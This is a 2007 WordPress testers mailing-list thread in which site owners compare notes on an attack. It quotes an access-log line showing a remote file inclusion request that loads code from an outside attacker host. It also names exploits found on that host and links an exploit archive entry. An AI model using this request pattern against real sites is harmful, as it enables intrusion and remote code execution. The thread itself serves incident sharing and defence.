Also, whilst looking at that, were you not hit by this exploit either: http://www.milw0rm.com/exploits/4721
On Dec 28, 2007 11:37 PM, DD32 <[EMAIL PROTECTED]> wrote: > On Sat, 29 Dec 2007 10:23:12 +1100, Simon Hollingshead < > [EMAIL PROTECTED]> wrote: > > > Now I'm no expert but by the contents of http://gw-gold.net/xpl/bot.c > > It seems like they endorse and hold DoS scripts on their server. > > Looking around, I've seen a few others refering to the id.txt file and > access attempts to WP, All of them are located on different servers, and the > file no longer exists, My guess is that they're just using random hosts > which have been exploited, rather than using servers they actually own. > It also appears to be mainly targetting specific WP plugins -- Most likely > older versions, And several other common applications which have known > vulnerabilities in older versions. > > > There is also a GZipped Tarball file within the xpl directory but I > don't > > know if I should risk opening it. They do DoS, what's to say they don't > > also hold virii? > > Theres 2 dozen compiled Linux exploits, and the C code for "Gpsd remote > format string exploit" and "expand_stack SMP race local root exploit" which > would be POC's > The naming of the compiled files is "woot" "pwned" "own" "mailbomb" ..all > useless names :) > > > > > On Dec 28, 2007 11:07 PM, cpa31335 <[EMAIL PROTECTED]> wrote: > > > >> here's a snippet of my Hosts log file: > >> > >> 4.66.112.173 <http://64.66.112.173/> - - [17/Dec/2007:04:00:44 -0800] > "GET > >> /?q=node/2//?q=nodehttp://gw-gold.net/xpl/id.txt > >> > >> that is what was used. I also sent this to [EMAIL PROTECTED] > >> > >> nice. > >> > >> 8-( > >> > >> > >> > >> -- > >> -Chuck Adkins > >> Owner and Publisher > >> The Populist News Service > >> http://www.thepopulistblog.com > >> Personal Blog: > >> http://www.thepopulistblog.com/wordpress > >> _______________________________________________ > >> wp-testers mailing list > >> [email protected] > >> http://lists.automattic.com/mailman/listinfo/wp-testers > >> > > _______________________________________________ > > wp-testers mailing list > > [email protected] > > http://lists.automattic.com/mailman/listinfo/wp-testers > > > > > > _______________________________________________ > wp-testers mailing list > [email protected] > http://lists.automattic.com/mailman/listinfo/wp-testers > _______________________________________________ wp-testers mailing list [email protected] http://lists.automattic.com/mailman/listinfo/wp-testers
